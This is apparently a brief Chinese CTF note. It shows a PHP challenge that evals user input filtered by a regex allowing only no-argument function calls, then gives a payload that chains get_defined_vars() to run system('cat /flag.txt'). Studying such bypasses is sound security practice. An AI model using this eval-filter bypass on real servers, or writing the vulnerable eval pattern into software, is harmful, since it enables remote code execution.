最近碰到的一道题,简单记录,有机会再补充 eg <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } 主要思路是利用无参函数,最后的参数 code=eval(end(current(get_defined_vars()))); & a=system("cat /flag.txt");